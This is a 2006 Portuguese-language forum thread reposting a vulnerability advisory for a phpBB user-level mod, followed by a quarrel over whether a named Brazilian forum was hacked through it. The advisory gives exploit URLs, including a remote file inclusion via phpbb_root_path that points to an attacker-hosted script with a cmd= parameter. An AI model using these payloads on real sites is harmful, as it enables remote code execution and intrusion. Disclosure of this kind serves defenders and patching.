phpBB 2.0.21 User Class Mod Vuln

Started by slul, 24 de June , 2006, 12:49:46 AM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Print
Go Down Pages1
User actions

slul

24 de June , 2006, 12:49:46 AM Last Edit: 24 de June , 2006, 10:57:49 AM by DarkGenesis
Code Select
_________________________________________________________________________


           /      \
        \  \  ,,  /  /
         '-.`\()/`.-'
        .--_'(  )'_--.
       / /` /`""`\ `\ \           * SpiderZ ForumZ Security *
        |  |  ><  |  |
        \  \      /  /
            '.__.'       


> Autore: SpiderZ
=> User Class ( User Level hack ) phpBB mod Vulnerability
=> Per: phpBB 2.0.x - 2.0.21
=> Sito: http://www.spiderz.altervista.org
=> Sito2: https://www.spiderz.netsons.org

_________________________________________________________________________

Bug level_list.php
includes/class_user.php

http://www.[ Web site ]/[ folder ]/level_list.php?level=

http://www.[ Web site ]/[ folder ]/level_list.php?phpbb_root_path=http://[  Web site ]/[  File Script ]?&cmd=


Download Mod: http://www.phpbbhacks.com/download.php?id=3250


Imagens que comprovam a falha depois de explorada








Foi por causa desse bug que hackearam o forum do invasao.com.br e agora ele tah sendo reformulado

Abraços!

Fonte: h4cky0u.org

Fox

#1
25 de June , 2006, 06:07:33 PM
Slul...da pra explicar melhor o bug?

slul

#2
25 de June , 2006, 06:50:13 PM
cara a explicação tava no link soh q o link qbrou n sei pq =/

Desculpem =(.

Mas vo dar uma procurada e posto algo aqui!

Anonymous

#3
25 de June , 2006, 08:05:35 PM
Cara,

Me desculpe mais "vcs" são Ridiculos. Em nenhum momento eu retirei o Forum Invasão completamente do ar. Apenas retirei o link principal, para evitar novos posts. Mais qualquer usuário avançado poderia percorrer pelo fórum se quisesse como alguns o fizeram.

Infelizmente alguns infelizes "usuários daqui" "tentam" diariamente invadir o Invasão.

Eu vejo os posts aqui e nem goste de comentar nada, deixo que fiquem "felizes" na sua própria ignorância mais ai já é demais.

Sem mais!!!

thorking

#4
25 de June , 2006, 08:23:39 PM
ai meu Deus só porque deixamos o site off por algum tempo aparece gente se vangloriando uahuhauhauha q pena  disso !  a prova disso fo a aparencia do forum que deu uma mudança drastica.

Nêmesis

#5
25 de June , 2006, 08:30:20 PM
Slul o forum não ficou off por algum tempo por causa de bug não,vc esta muito enganado ...
Estavamos instalando uma nova cara para o forum e talz cara .. não teve nada haver com Bugs mesmo !!!

Flw e espero ter esclarecido !!!

slul

#6
25 de June , 2006, 08:31:52 PM
primeiramente eu nao estou me vangloriando to falando isso pq vi o conteudo da segunda foto esses dias qdo tentei acessar o invasao...

Thorking e Souzadc vcs sao ridiculos memso e demonstram o nivel do Forum do invasao.com.br

Desculpem aos moderadores mas fui atacado e nao poderia ficar sem responder esses SERES.

Eu já ajudei muito o invasao.com.br

Perguntem ao Diogenes já mandei diversas vulnerabilidades.

E normalmente pego o invasao.com.br pra usar como exemplo em meus exploits por ser o primeiro site que usa phpbb que me vem a cabeça.

DarkGenesis

#7
25 de June , 2006, 08:34:04 PM
Por favor discutem isso por MSN ou MP



Tópico Bloqueado
Print
Go Up Pages1
User actions